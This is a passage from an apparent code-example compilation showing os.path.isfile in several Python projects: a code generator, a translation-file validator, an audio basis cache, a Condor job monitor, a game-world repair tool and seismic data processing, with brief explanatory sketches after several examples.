innulls = outfile.write((innulls and '\n' or '') + (' %-50s /* tp_new */\n' % ("(newfunc)%s," % genericconstrs[fields.constructor.type])))
else:
innulls = outfile.write((innulls and '\n' or '') + (' %-50s /* tp_new */\n' % ("(newfunc)%s_abstract_constructor," % type)))
else:
innulls=write0(innulls)
return innulls
additional=[]
for (subtype, submethods, subappendix) in [('PyNumberMethods', specialnumericmethods, '_as_number'),
('PySequenceMethods', specialsequencemethods, '_as_sequence'),
('PyMappingMethods', specialmappingmethods, '_as_mapping')]:
hasit = hasany(submethods, fields)
additional.append(hasit)
if hasit:
outfile.write(subtype+' '+type+subappendix +' = {\n')
innulls=writeslots(submethods, 0)
outfile.write((innulls and '\n' or '') + '};\n\n')
hasnumeric, hassequence, hasmapping = tuple(additional)
outfile.write('PyTypeObject PyOr'+type+'_Type_inh = {\n')
outfile.write(' PyObject_HEAD_INIT((_typeobject *)&PyType_Type)\n')
outfile.write(' 0,\n')
displayname = getattr(fields, "displayname", "Orange.core."+type) # was: <modulename>.<type>
outfile.write(' "%s",\n' % displayname)
outfile.write(' sizeof(%s), 0,\n' % fields.datastructure)
innulls=writeslots(specialmethods, 1)
outfile.write((innulls and '\n' or '') + '};\n\n')
if fields.datastructure == "TPyOrange":
outfile.write(cc_functions % {"type": type})
outfile.write('%(modulename)s_API TOrangeType PyOr%(type)s_Type (PyOr%(type)s_Type_inh, typeid(T%(type)s)' % {"modulename": modulename.upper(), "type": type})
outfile.write(', ' + (fields.constructor and fields.constructor.type!="MANUAL" and type+'_default_constructor' or '0'))
if fields.datastructure == "TPyOrange":
outfile.write(', cc_%s, ccn_%s' % (type, type))
else:
outfile.write(', PyOr_noConversion, PyOr_noConversion')
outfile.write(', ' + (fields.constructor_keywords and type+'_constructor_keywords' or 'NULL'))
outfile.write(', ' + (fields.constructor and fields.constructor.allows_empty_args and 'true' or 'false'))
outfile.write(', ' + (fields.recognized_attributes and type+'_recognized_attributes' or 'NULL'))
outfile.write(', ' + (aliases.has_key(type) and type+'_aliases' or 'NULL'))
outfile.write(');\n\n\n\n')
if not (fields.abstract or fields.constructor and fields.constructor.allows_empty_args or fields.methods.has_key("__reduce__")):
printV0("Warning: class '%s' will not be picklable", type, False)
outfile.close()
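Example 63 combines os.path.isfile with os.path.getmtime for a make-style freshness check (skip regeneration when the target is newer than its inputs) and again to remove a stale target that no longer defines any classes. A compact sketch of both uses:

import os
import os.path

def needs_rebuild(target, sources):
    # Rebuild when the target is missing or older than any of its inputs.
    if not os.path.isfile(target):
        return True
    target_mtime = os.path.getmtime(target)
    return any(os.path.getmtime(src) > target_mtime for src in sources)

def remove_if_present(path):
    # Delete a stale output only if it exists; removing a missing file would raise OSError.
    if os.path.isfile(path):
        os.remove(path)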
0
Example 64
def validate_file(file_path, validation_mode, reference_pot=None):
'''
Given a pot or po file scan all it's entries looking for problems
with variable substitutions. See the following functions for
details on how the validation is performed.
* validate_substitutions_match()
* validate_substitution_syntax()
* validate_positional_substitutions()
Returns the number of entries with errors.
For po files, ``reference_pot`` gives a pot file to merge with (to recover
comments and file locations)
'''
def emit_messages():
if n_warnings:
warning_lines.insert(0, section_seperator)
warning_lines.insert(1, "%d validation warnings in %s" % (n_warnings, file_path))
print('\n'.join(warning_lines))
if n_errors:
error_lines.insert(0, section_seperator)
error_lines.insert(1, "%d validation errors in %s" % (n_errors, file_path))
print('\n'.join(error_lines))
Result = namedtuple('ValidateFileResult', ['n_entries', 'n_msgids', 'n_msgstrs', 'n_warnings', 'n_errors'])
warning_lines = []
error_lines = []
n_entries = 0
n_msgids = 0
n_msgstrs = 0
n_entries = 0
n_warnings = 0
n_errors = 0
n_plural_forms = 0
if not os.path.isfile(file_path):
error_lines.append(entry_seperator)
error_lines.append('file does not exist "%s"' % (file_path))
n_errors += 1
emit_messages()
return Result(n_entries=n_entries, n_msgids=n_msgids, n_msgstrs=n_msgstrs, n_warnings=n_warnings, n_errors=n_errors)
try:
po = polib.pofile(file_path)
except Exception as e:
error_lines.append(entry_seperator)
error_lines.append('Unable to parse file "%s": %s' % (file_path, e))
n_errors += 1
emit_messages()
return Result(n_entries=n_entries, n_msgids=n_msgids, n_msgstrs=n_msgstrs, n_warnings=n_warnings, n_errors=n_errors)
if validation_mode == 'po' and reference_pot:
# Merge the .pot file for comments and file locations
po.merge(reference_pot)
if validation_mode == 'po':
plural_forms = po.metadata.get('Plural-Forms')
if not plural_forms:
error_lines.append(entry_seperator)
error_lines.append("%s: does not have Plural-Forms header" % file_path)
n_errors += 1
match = re.search(r'\bnplurals\s*=\s*(\d+)', plural_forms)
if match:
n_plural_forms = int(match.group(1))
else:
error_lines.append(entry_seperator)
error_lines.append("%s: does not specify integer nplurals in Plural-Forms header" % file_path)
n_errors += 1
n_entries = len(po)
for entry in po:
entry_warnings = []
entry_errors = []
have_msgid = entry.msgid.strip() != ''
have_msgid_plural = entry.msgid_plural.strip() != ''
have_msgstr = entry.msgstr.strip() != ''
if have_msgid:
n_msgids += 1
if have_msgid_plural:
n_msgids += 1
if have_msgstr:
n_msgstrs += 1
if validation_mode == 'pot':
prog_langs = get_prog_langs(entry)
if have_msgid:
errors = validate_positional_substitutions(entry.msgid, prog_langs, 'msgid')
entry_errors.extend(errors)
if have_msgid_plural:
errors = validate_positional_substitutions(entry.msgid_plural, prog_langs, 'msgid_plural')
entry_errors.extend(errors)
elif validation_mode == 'po':
if have_msgid:
if have_msgstr:
errors = validate_substitutions_match(entry.msgid, entry.msgstr, 'msgid', 'msgstr')
entry_errors.extend(errors)
if have_msgid_plural and have_msgstr:
n_plurals = 0
for index, msgstr in entry.msgstr_plural.items():
have_msgstr_plural = msgstr.strip() != ''
if have_msgstr_plural:
n_plurals += 1
errors = validate_substitutions_match(entry.msgid_plural, msgstr, 'msgid_plural', 'msgstr_plural[%s]' % index)
entry_errors.extend(errors)
else:
entry_errors.append('msgstr_plural[%s] is empty' % (index))
if n_plural_forms != n_plurals:
entry_errors.append('%d plural forms specified, but this entry has %d plurals' % (n_plural_forms, n_plurals))
if pedantic:
if have_msgid:
errors = validate_substitution_syntax(entry.msgid, 'msgid')
entry_warnings.extend(errors)
if have_msgid_plural:
errors = validate_substitution_syntax(entry.msgid_plural, 'msgid_plural')
entry_warnings.extend(errors)
errors = validate_substitutions_match(entry.msgid, entry.msgid_plural, 'msgid', 'msgid_plural')
entry_warnings.extend(errors)
for index, msgstr in entry.msgstr_plural.items():
have_msgstr_plural = msgstr.strip() != ''
if have_msgstr_plural:
errors = validate_substitution_syntax(msgstr, 'msgstr_plural[%s]' % index)
entry_warnings.extend(errors)
if have_msgstr:
errors = validate_substitution_syntax(entry.msgstr, 'msgstr')
entry_warnings.extend(errors)
if entry_warnings:
warning_lines.append(entry_seperator)
warning_lines.append('locations: %s' % (', '.join(["%s:%d" % (x[0], int(x[1])) for x in entry.occurrences])))
warning_lines.extend(entry_warnings)
n_warnings += 1
if entry_errors:
error_lines.append(entry_seperator)
error_lines.append('locations: %s' % (', '.join(["%s:%d" % (x[0], int(x[1])) for x in entry.occurrences])))
error_lines.extend(entry_errors)
n_errors += 1
emit_messages()
return Result(n_entries=n_entries, n_msgids=n_msgids, n_msgstrs=n_msgstrs, n_warnings=n_warnings, n_errors=n_errors)
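In this validator, os.path.isfile turns a missing .po/.pot file into a counted validation error rather than an unhandled exception, so a batch run can report every problem at once. A condensed, polib-free sketch of that accumulate-and-continue pattern:

import os.path

def check_exists(file_path, error_lines):
    # Record the problem and keep going; one missing file should not abort the whole run.
    if not os.path.isfile(file_path):
        error_lines.append('file does not exist "%s"' % file_path)
        return False
    return True

errors = []
for path in ('messages.pot', 'de/LC_MESSAGES/messages.po'):   # hypothetical paths
    check_exists(path, errors)
if errors:
    print('\n'.join(errors))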
0
Example 65
Project: pyfasst Source File: separateLeadFunctions.py
def generate_WF0_NSGTMinQT_chirped(minF0, maxF0, cqtfmax, cqtfmin, cqtbins=48.,
Fs=44100., Nfft=2048, stepNotes=4, \
lengthWindow=2048, Ot=0.5, perF0=1, \
depthChirpInSemiTone=0.5, loadWF0=True,
analysisWindow='hanning',
atomHopFactor=0.25,
cqtWinFunc=np.hanning, verbose=False):
"""
::
F0Table, WF0 = generate_WF0_MinCQT_chirped(minF0, maxF0, Fs, Nfft=2048,
stepNotes=4, lengthWindow=2048,
Ot=0.5, perF0=2,
depthChirpInSemiTone=0.5)
Generates a 'basis' matrix for the source part WF0, using the
source model KLGLOTT88, with the following I/O arguments:
Inputs:
:param minF0:
the minimum value for the fundamental
frequency (F0)
:param maxF0:
the maximum value for F0
:param cqtfmax:
...
:param Fs:
the desired sampling rate
:param Nfft:
the number of bins to compute the Fourier
transform
:param stepNotes:
the number of F0 per semitone
:param lengthWindow:
the size of the window for the Fourier
transform
:param Ot:
the glottal opening coefficient for
KLGLOTT88
:param perF0:
the number of chirps considered per F0
value
:param depthChirpInSemiTone:
the maximum value, in semitone, of the
allowed chirp per F0
Outputs:
:returns:
* `F0Table` - the vector containing the values of the fundamental
frequencies in Hertz (Hz) corresponding to the
harmonic combs in WF0, i.e. the columns of WF0
* `WF0` - the basis matrix, where each column is a harmonic comb
generated by KLGLOTT88 (with a sinusoidal model, then
transformed into the spectral domain)
20120828T2358 Horribly slow...
"""
# generating a filename to keep data:
filename = str('').join(['wf0nsgtminqt_',
'_minF0-', str(minF0),
'_maxF0-', str(maxF0),
'_cqtfmax-', str(cqtfmax),
'_cqtfmin-', str(cqtfmin),
'_cqtbins-', str(cqtbins),
'_Fs-', str(int(Fs)),
'_Nfft-', str(int(Nfft)),
'_atomHopFactor-%.2f' %(atomHopFactor),
'_stepNotes-', str(int(stepNotes)),
'_Ot-', str(Ot),
'_perF0-', str(int(perF0)),
'_depthChirp-', str(depthChirpInSemiTone),
'_analysisWindow-', analysisWindow,
'_cqtwinfunc-', cqtWinFunc.__name__,
'.npz'])
if os.path.isfile(filename) and loadWF0:
print "Reading WF0 and F0Table from stored arrays in %s." %filename
struc = np.load(filename)
return struc['F0Table'], struc['WF0'], struc['mqt'].tolist()
else:
print "No such file: %s." %filename
print "First time WF0 computed with these parameters, please wait..."
# converting to double arrays:
minF0=np.double(minF0)
maxF0=np.double(maxF0)
Fs=np.double(Fs)
stepNotes=np.double(stepNotes)
# computing the F0 table:
numberOfF0 = np.ceil(12.0 * stepNotes * np.log2(maxF0 / minF0)) + 1
F0Table=minF0 * (2 ** (np.arange(numberOfF0,dtype=np.double) \
/ (12 * stepNotes)))
numberElementsInWF0 = numberOfF0 * perF0
# note: cqtfmax should actually be computed so as to guarantee
# the desired Nfft:
# cqtfmax = np.ceil(3. * Fs / (Nfft * (2**(1./cqtbins) - 1)))
# strange things happening to FFTLen...
if verbose>1: print "cqtfmax set to", cqtfmax
mqt = nsgt.nsgtMinQT(ftlen=Nfft,
cqtfmin=cqtfmin,
cqtfmax=cqtfmax,
bpo=cqtbins,
fs=Fs,
datalength=lengthWindow,
)
if verbose>2:
print mqt.cqtkernel
print mqt.fmin, mqt.fmax, mqt.linFTLen, mqt.octaveNr, mqt.linBins
# computing the desired WF0 matrix
WF0 = np.zeros([mqt.cqtkernel.bins*mqt.octaveNr+
mqt.cqtkernel.linBins,
numberElementsInWF0],
dtype=np.double)
# slow... try faster : concatenate the odgd, compute one big cqt of that
# result and extract only the desired frames:
##odgds = np.array([])
for fundamentalFrequency in np.arange(numberOfF0):
if verbose>0:
print " f0 n.", fundamentalFrequency+1, "/", numberOfF0
odgd, odgdSpec = \
generate_ODGD_spec(F0Table[fundamentalFrequency], Fs, \
Ot=Ot, lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0,\
analysisWindowType=analysisWindow)
mqt.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((mqt.datalen_init / 2. - mqt.time_stamps)**2)
if verbose>1: print midindex, mqt.transfo.shape, WF0.shape
WF0[:,fundamentalFrequency * perF0] = np.abs(mqt.transfo[:,midindex])**2
# del mqt.transfo # maybe needed but might slow down even more...
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##print odgds.shape, odgd.shape
for chirpNumber in np.arange(perF0 - 1):
F2 = F0Table[fundamentalFrequency] \
* (2 ** ((chirpNumber + 1.0) * depthChirpInSemiTone \
/ (12.0 * (perF0 - 1.0))))
# F0 is the mean of F1 and F2.
F1 = 2.0 * F0Table[fundamentalFrequency] - F2
odgd, odgdSpec = \
generate_ODGD_spec_chirped(F1, F2, Fs, \
Ot=Ot, \
lengthOdgd=lengthWindow, \
Nfft=Nfft, t0=0.0)
mqt.computeTransform(data=odgd)
# getting the cqt transform at the middle of the window:
midindex = np.argmin((mqt.datalen_init / 2.
- mqt.time_stamps)**2)
WF0[:,fundamentalFrequency * perF0 + chirpNumber + 1] = \
np.abs(mqt.transfo[:,midindex]) ** 2
# del mqt.transfo # idem
##odgds = np.concatenate([odgds, odgd/(np.abs(odgd).max()*1.2)])
##hybt.computeHybrid(data=odgds)
##midindex = np.argmin((lengthWindow / 2. + lengthWindow
## * np.vstack(np.arange(numberElementsInWF0))
## - hybt.time_stamps)**2, axis=1)
##if verbose>1: print midindex
##WF0 = np.abs(hybt.spCQT[:,midindex]) ** 2
np.savez(filename, F0Table=F0Table, WF0=WF0, mqt=mqt)
return F0Table, WF0, mqt #, hybt, odgds
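The isfile() check here is an on-disk cache: the expensive WF0 basis is recomputed only when no .npz with a matching parameter-derived name exists, and saved with numpy.savez afterwards. A generic sketch of that memoisation idea, with compute_fn standing in for the heavy computation:

import os.path
import numpy as np

def cached_compute(cache_file, compute_fn, use_cache=True):
    # Reuse the stored result when the cache file already exists on disk.
    if use_cache and os.path.isfile(cache_file):
        return np.load(cache_file)['result']
    result = compute_fn()
    np.savez(cache_file, result=result)
    return result

# e.g. a WF0-style matrix rebuilt only on the first call:
# matrix = cached_compute('wf0_cache.npz', lambda: np.random.rand(512, 128))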
0
Example 66
def updateMonitoringInformation(jobs):
jobDict = {}
for job in jobs:
if job.backend.id:
jobDict[job.backend.id] = job
idList = jobDict.keys()
if not idList:
return
queryCommand = " ".join\
([
"condor_q -global" if getConfig(
"Condor")["query_global_queues"] else "condor_q",
"-format \"%s \" GlobalJobId",
"-format \"%s \" RemoteHost",
"-format \"%d \" JobStatus",
"-format \"%f\\n\" RemoteUserCpu"
])
status, output = commands.getstatusoutput(queryCommand)
if 0 != status:
logger.error("Problem retrieving status for Condor jobs")
return
if ("All queues are empty" == output):
infoList = []
else:
infoList = output.split("\n")
allDict = {}
for infoString in infoList:
tmpList = infoString.split()
id, host, status, cputime = ("", "", "", "")
if 3 == len(tmpList):
id, status, cputime = tmpList
if 4 == len(tmpList):
id, host, status, cputime = tmpList
if id:
allDict[id] = {}
allDict[id]["status"] = Condor.statusDict[status]
allDict[id]["cputime"] = cputime
allDict[id]["host"] = host
fg = Foreground()
fx = Effects()
status_colours = {'submitted': fg.orange,
'running': fg.green,
'completed': fg.blue}
for id in idList:
printStatus = False
if jobDict[id].status == "killed":
continue
localId = id.split("#")[-1]
globalId = id
if globalId == localId:
queryCommand = " ".join\
([
"condor_q -global" if getConfig(
"Condor")["query_global_queues"] else "condor_q",
"-format \"%s\" GlobalJobId",
id
])
status, output = commands.getstatusoutput(queryCommand)
if 0 == status:
globalId = output
if globalId in allDict.keys():
status = allDict[globalId]["status"]
host = allDict[globalId]["host"]
cputime = allDict[globalId]["cputime"]
if status != jobDict[id].backend.status:
printStatus = True
stripProxy(jobDict[id])._getSessionLock()
jobDict[id].backend.status = status
if jobDict[id].backend.status == "Running":
jobDict[id].updateStatus("running")
if host:
if jobDict[id].backend.actualCE != host:
jobDict[id].backend.actualCE = host
jobDict[id].backend.cputime = cputime
else:
jobDict[id].backend.status = ""
outDir = jobDict[id].getOutputWorkspace().getPath()
condorLogPath = "".join([outDir, "condorLog"])
checkExit = True
if os.path.isfile(condorLogPath):
checkExit = False
for line in open(condorLogPath):
if -1 != line.find("terminated"):
checkExit = True
break
if -1 != line.find("aborted"):
checkExit = True
break
if checkExit:
printStatus = True
stdoutPath = "".join([outDir, "stdout"])
jobStatus = "failed"
if os.path.isfile(stdoutPath):
with open(stdoutPath) as stdout:
lineList = stdout.readlines()
try:
exitLine = lineList[-1]
exitCode = exitLine.strip().split()[-1]
except IndexError:
exitCode = '-1'
if exitCode.isdigit():
jobStatus = "completed"
else:
# Some filesystems/setups have the file created but empty - only worry if it's been 10mins
# since we first checked the file
if len(lineList) == 0:
if not jobDict[id].backend._stdout_check_time:
jobDict[id].backend._stdout_check_time = time.time()
if (time.time() - jobDict[id].backend._stdout_check_time) < 10*60:
continue
else:
logger.error("Empty stdout file from job %s after waiting 10mins. Marking job as"
"failed." % jobDict[id].fqid)
else:
logger.error("Problem extracting exit code from job %s. Line found was '%s'." % (
jobDict[id].fqid, exitLine))
jobDict[id].updateStatus(jobStatus)
if printStatus:
if jobDict[id].backend.actualCE:
hostInfo = jobDict[id].backend.actualCE
else:
hostInfo = "Condor"
status = jobDict[id].status
if status in status_colours:
colour = status_colours[status]
else:
colour = fg.magenta
if "submitted" == status:
preposition = "to"
else:
preposition = "on"
if jobDict[id].backend.status:
backendStatus = "".join\
([" (", jobDict[id].backend.status, ") "])
else:
backendStatus = ""
logger.info(colour + 'Job %s %s%s %s %s - %s' + fx.normal,
jobDict[
id].fqid, status, backendStatus, preposition, hostInfo,
time.strftime('%c'))
return None
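Two isfile() calls drive the post-mortem logic in this monitor: the Condor log is only scanned for "terminated"/"aborted" when it exists, and the exit code is only parsed once a stdout file has appeared. A small sketch of the stdout part of that check (path layout and the 'completed'/'failed' labels mirror the example, but this is not the Ganga API):

import os.path

def status_from_stdout(out_dir):
    # No stdout file, or an stdout without a numeric exit code, means failure.
    stdout_path = os.path.join(out_dir, 'stdout')
    if not os.path.isfile(stdout_path):
        return 'failed'
    with open(stdout_path) as stdout:
        lines = stdout.readlines()
    if not lines:
        return 'failed'   # file created but still empty
    last_fields = lines[-1].strip().split()
    if not last_fields:
        return 'failed'
    return 'completed' if last_fields[-1].isdigit() else 'failed'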
0
Example 67
Project: py-starbound Source File: repair.py
def main():
p = optparse.OptionParser('Usage: %prog [options] <input file>')
p.add_option('-f', '--force', dest='force',
action='store_true', default=False,
help='ignore some errors')
p.add_option('-o', '--output', dest='output',
help='where to output repaired world (defaults to input file '
'path with .repaired added to the end)')
p.add_option('-w', '--blank-world', dest='world',
help='the blank .world file that was created in place of the '
'.fail one (for metadata recovery)')
options, arguments = p.parse_args()
# Get the path from arguments.
if len(arguments) != 1:
p.error('incorrect number of arguments')
try:
fh = open(arguments[0], 'rb')
file_size = os.fstat(fh.fileno()).st_size
world = starbound.World(fh)
except Exception as e:
p.error('could not open fail file ({})'.format(e))
# Output path (defaults to fail file + .repaired).
if options.output:
out_name = options.output
else:
out_name = arguments[0] + '.repaired'
# Ensure the user doesn't accidentally overwrite existing files.
if os.path.isfile(out_name):
if options.force:
print('warning: overwriting existing file')
else:
p.error('"{}" already exists'.format(out_name))
# Allow user to use the fresh world for metadata (which should be the same).
if options.world:
fail_name = os.path.basename(arguments[0])
world_name = os.path.basename(options.world)
if fail_name[:len(world_name)] != world_name:
if options.force:
print('warning: .fail and .world filenames do not match')
else:
p.error('.fail and .world filenames do not match')
try:
blank_world = starbound.World(open(options.world, 'rb'))
except Exception as e:
p.error('could not open blank world ({})'.format(e))
# This dict will contain all the keys and their data.
data = dict()
try:
world.read_metadata()
metadata, version = world.metadata, world.metadata_version
except Exception as e:
if options.world:
try:
print('warning: restoring metadata using blank world')
blank_world.read_metadata()
metadata, version = blank_world.metadata, blank_world.metadata_version
except Exception as e:
p.error('failed to restore metadata ({})'.format(e))
else:
p.error('metadata section is corrupt ({})'.format(e))
try:
size = metadata['worldTemplate']['size']
except Exception as e:
size = [-1, -1]
print('warning: failed to read world size ({})'.format(e))
regions_x = int(math.ceil(size[0] / 32))
regions_y = int(math.ceil(size[1] / 32))
print('attempting to recover {}×{} regions...'.format(regions_x, regions_y))
block_count = int((file_size - starbound.btreedb5.HEADER_SIZE) / world.block_size)
blocks_per_percent = block_count // 100 + 1
nodes_recovered = 0
percent = 0
# Find all leaves and try to read them individually.
for index in range(block_count):
if index % blocks_per_percent == 0:
print('{}% ({} nodes recovered)'.format(percent, nodes_recovered))
percent += 1
# Seek to the block and only process it if it's a leaf.
world.stream.seek(starbound.btreedb5.HEADER_SIZE + world.block_size * index)
if world.stream.read(2) != starbound.btreedb5.LEAF:
continue
stream = starbound.btreedb5.LeafReader(world)
try:
num_keys, = struct.unpack('>i', stream.read(4))
except Exception as e:
print('failed to read keys of leaf block #{}: {}'.format(index, e))
continue
# Ensure that the number of keys makes sense, otherwise skip the leaf.
if num_keys > 100:
continue
for i in range(num_keys):
try:
cur_key = stream.read(world.key_size)
cur_data = starbound.sbon.read_bytes(stream)
except Exception as e:
print('could not read key/data: {}'.format(e))
break
layer, x, y = struct.unpack('>BHH', cur_key)
# Skip this leaf if we encounter impossible indexes.
if layer == 0 and (x != 0 or y != 0):
break
if layer not in (0, 1, 2) or x >= regions_x or y >= regions_y:
break
result = None
if cur_key in data:
# Duplicates should be checked against the index, which always wins.
# TODO: Make this code run again.
try:
#result = world.get(layer, x, y)
result = None
except Exception:
world.swap_root()
try:
#result = world.get(layer, x, y)
result = None
except Exception:
pass
world.swap_root()
# Use the data from this leaf if not using the index.
if not result:
try:
result = zlib.decompress(cur_data)
except Exception as e:
print('broken leaf node: {}'.format(e))
continue
# Validate the data before storing it.
try:
if layer == 0:
temp_stream = io.BytesIO(result)
temp_stream.seek(8)
name, _, _ = starbound.read_versioned_json(temp_stream)
assert name == 'WorldMetadata', 'broken world metadata'
elif layer == 1:
assert len(result) == 3 + 32 * 32 * 30, 'broken region data'
elif layer == 2:
temp_stream = io.BytesIO(result)
for _ in range(starbound.sbon.read_varint(temp_stream)):
starbound.read_versioned_json(temp_stream)
except Exception as e:
print('invalid key data: {}'.format(e))
continue
# Count the node the first time it's stored.
if cur_key not in data:
nodes_recovered += 1
data[cur_key] = zlib.compress(result)
METADATA_KEY = b'\x00\x00\x00\x00\x00'
# Ensure that the metadata key is in the data.
if METADATA_KEY not in data:
if options.world:
try:
data[METADATA_KEY] = blank_world.get(0, 0, 0)
except Exception:
p.error('failed to recover metadata from alternate world')
else:
if options.force:
try:
data[METADATA_KEY] = world.get(0, 0, 0)
print('warning: using partially recovered metadata')
except Exception:
p.error('failed to recover partial metadata')
else:
p.error('failed to recover metadata; use -w to load metadata '
'from another world, or -f to attempt partial recovery')
print('done! {} nodes recovered'.format(nodes_recovered))
print('creating BTree database...')
# Try not to exceed this number of keys per leaf.
LEAF_KEYS_TRESHOLD = 10
# Try not to exceed this size for a leaf.
LEAF_SIZE_TRESHOLD = world.block_size * .8
# Fill indexes up to this ratio.
INDEX_FILL = .9
# 6 is the number of bytes used for signature + next block pointer.
LEAF_BYTES = world.block_size - 6
# 11 is the number of bytes in the index header.
INDEX_BYTES = world.block_size - 11
# Maximum number of keys that can go into an index.
INDEX_MAX_KEYS = int(INDEX_BYTES // (world.key_size + 4) * INDEX_FILL)
# The data of individual blocks will be stored in this list.
blocks = []
buffer = io.BytesIO()
# This will create an initial leaf and connect it to following leaves which
# will all contain the data currently in the buffer.
def dump_buffer():
buffer_size = buffer.tell()
buffer.seek(0)
block_data = b'LL' + struct.pack('>i', num_keys) + buffer.read(LEAF_BYTES - 4)
while buffer.tell() < buffer_size:
blocks.append(block_data + struct.pack('>i', len(blocks) + 1))
block_data = b'LL' + buffer.read(LEAF_BYTES)
blocks.append(block_data.ljust(world.block_size - 4, b'\x00') + struct.pack('>i', -1))
# Empty the buffer.
buffer.seek(0)
buffer.truncate()
# The number of keys that will be stored in the next created leaf.
num_keys = 0
# Map of key range to leaf block pointer.
range_to_leaf = dict()
# All the keys, sorted (important).
keys = sorted(data)
# Build all the leaf blocks.
min_key = None
for key in keys:
if not num_keys:
# Remember the first key of the leaf.
min_key = key
buffer.write(key)
starbound.sbon.write_bytes(buffer, data[key])
num_keys += 1
# Empty the buffer once one of the thresholds is reached.
if num_keys >= LEAF_KEYS_TRESHOLD or buffer.tell() >= LEAF_SIZE_TRESHOLD:
range_to_leaf[(min_key, key)] = len(blocks)
dump_buffer()
num_keys = 0
# Empty any remaining data in the buffer.
if buffer.tell():
range_to_leaf[(min_key, key)] = len(blocks)
dump_buffer()
print('created {} blocks containing world data'.format(len(blocks)))
def build_index_level(range_to_block, level=0):
# Get a list of ranges that this index level needs to point to.
index_ranges = sorted(range_to_block)
# The new list of ranges that the next level of indexes can use.
new_ranges = dict()
for i in range(0, len(index_ranges), INDEX_MAX_KEYS):
ranges = index_ranges[i:i + INDEX_MAX_KEYS]
min_key, _ = ranges[0]
_, max_key = ranges[-1]
left_block = range_to_block[ranges.pop(0)]
index_data = io.BytesIO()
index_data.write(b'II' + struct.pack('>Bii', level, len(ranges), left_block))
for key_range in ranges:
index_data.write(key_range[0] + struct.pack('>i', range_to_block[key_range]))
new_ranges[(min_key, max_key)] = len(blocks)
blocks.append(index_data.getvalue().ljust(world.block_size, b'\x00'))
print('- created {} index(es) for level {}'.format(len(new_ranges), level))
return new_ranges
# Build the indexes in multiple levels up to a single root node.
print('creating root node...')
root_is_leaf = True
level = 0
current_index = range_to_leaf
while len(current_index) > 1:
current_index = build_index_level(current_index, level)
root_is_leaf = False
level += 1
root_node = list(current_index.values())[0]
# Also build an alternative root node.
print('creating alternate root node...')
alternate_root_is_leaf = True
level = 0
current_index = range_to_leaf
while len(current_index) > 1:
current_index = build_index_level(current_index, level)
alternate_root_is_leaf = False
level += 1
alternate_root_node = list(current_index.values())[0]
# The last two blocks will be free blocks.
blocks.append(b'FF\xFF\xFF\xFF\xFF' + b'\x00' * (world.block_size - 6))
blocks.append(b'FF\xFF\xFF\xFF\xFF' + b'\x00' * (world.block_size - 6))
print('writing all the data to disk...')
with open(out_name, 'wb') as f:
header = struct.pack(starbound.btreedb5.HEADER,
b'BTreeDB5',
world.block_size,
world.name.encode('utf-8') + b'\x00' * (16 - len(world.name)),
world.key_size,
False,
len(blocks) - 1,
14282, # XXX: Unknown value!
root_node,
root_is_leaf,
len(blocks) - 2,
14274, # XXX: Unknown value!
alternate_root_node,
alternate_root_is_leaf)
f.write(header)
for block in blocks:
f.write(block)
print('done!')
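os.path.isfile appears early in this repair tool as an overwrite guard: the repaired world is never written over an existing file unless --force is given. A minimal sketch of the same safeguard as a standalone helper (argument handling reduced to plain parameters instead of optparse):

import os.path

def resolve_output(input_path, output=None, force=False):
    # Default to <input>.repaired and refuse to clobber an existing file without force.
    out_name = output or input_path + '.repaired'
    if os.path.isfile(out_name):
        if force:
            print('warning: overwriting existing file')
        else:
            raise SystemExit('"{}" already exists (pass force=True to overwrite)'.format(out_name))
    return out_name

# e.g. resolve_output('universe.world.fail')  ->  'universe.world.fail.repaired'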
0
Example 68
def build_section(fileB1,fileB2,channels,A0_int,A0_frac ,A1_int ,A1_frac ,filebase):
startB1 = None
endB1 = None
values_endB1 = None
values_startB2 = None
startB2 = None
endB2 = None
timespanA = round(A1_int - A0_int + (A1_frac - A0_frac )*1e-6,5)
no_samplesA = int(timespanA * 1e6) /2000 +1
if op.isfile(fileB1):
startB1 =np.float64(GetFirstLine(fileB1).strip().split()[-1])
endB1 = np.float64(tail(fileB1)[0].strip().split()[-1])
values_endB1 = [float(i) for i in tail(fileB1)[0].strip().split()[:-1]]
B10_int = int(startB1)
B10_frac = int(np.round( (startB1- B10_int)*1e6/2000)) * 2000
B11_int = int(endB1)
B11_frac = int(np.round( (endB1- B11_int)*1e6/2000)) * 2000
timespanB1 = round(B11_int - B10_int + (B11_frac - B10_frac )*1e-6,5)
no_samplesB1 = int(timespanB1 * 1e6) /2000
else:
fileB1 = None
if op.isfile(fileB2):
values_startB2 = [float(i) for i in GetFirstLine(fileB2).strip().split()[:-1]]
startB2 =np.float64(GetFirstLine(fileB2).strip().split()[-1])
endB2 = np.float64(tail(fileB2)[0].strip().split()[-1])
B20_int = int(startB2)
B20_frac = int(np.round( (startB2- B20_int)*1e6/2000)) * 2000
B21_int = int(endB2)
B21_frac = int(np.round( (endB2- B21_int)*1e6/2000)) * 2000
timespanB2 = round(B21_int - B20_int + (B21_frac - B20_frac )*1e-6,5)
no_samplesB2 = int(timespanB2 * 1e6) /2000
else:
fileB2 = None
# print startB1,endB1
# print startB2,endB2
if fileB1 is not None and fileB2 is not None:
#find time axis for bridging the gap between the B files
#...assuming 500 Hz here !!!
# working on mu s to avoid float64 rounding issues
t0_int = int(endB1)
t0_frac = int(np.round( (endB1- t0_int)*1e6/2000)) * 2000
t1_int = int(startB2)
t1_frac = int(np.round( (startB2 - t1_int)*1e6/2000)) * 2000
print "end {1}: {0:.6f}".format(endB1,fileB1), "start {1}: {0:.6f}".format(startB2,fileB2)
#print t0_int,t0_frac,t1_int,t1_frac
gap = round(t1_int - t0_int + (t1_frac - t0_frac )*1e-6,5)
# in mu s
no_samples = int(gap * 1e6) /2000 -1
#print no_samples,'{0:.6f}'.format(t0_frac),'{0:.6f}'.format(t0_frac+gap*1e-6)
taxis = (np.arange(no_samples+1)*2000 + t0_frac)[1:]
taxis = taxis*1e-6 + t0_int
print
print 'bridging gap ',"{0:.6f}".format(taxis[0]) , ' --> ', "{0:.6f}".format(taxis[-1]) , ' ',len(taxis) , 'samples'
#and the same for the actual values...:
bridge_data = np.zeros((len(taxis),len(values_startB2)),np.float32)
for i in range(len(values_startB2)):
bridge_data[:,i] = np.linspace(values_endB1[i],values_startB2[i],len(taxis)+1,endpoint=False)[1:]
# print values_endB1
# print values_startB2
# print bridge_data[0]
# print bridge_data[-1]
# sys.exit()
#Find the origin time of A in this set of B1, B2 and bridge:
# it must be in either B1 or the bridge
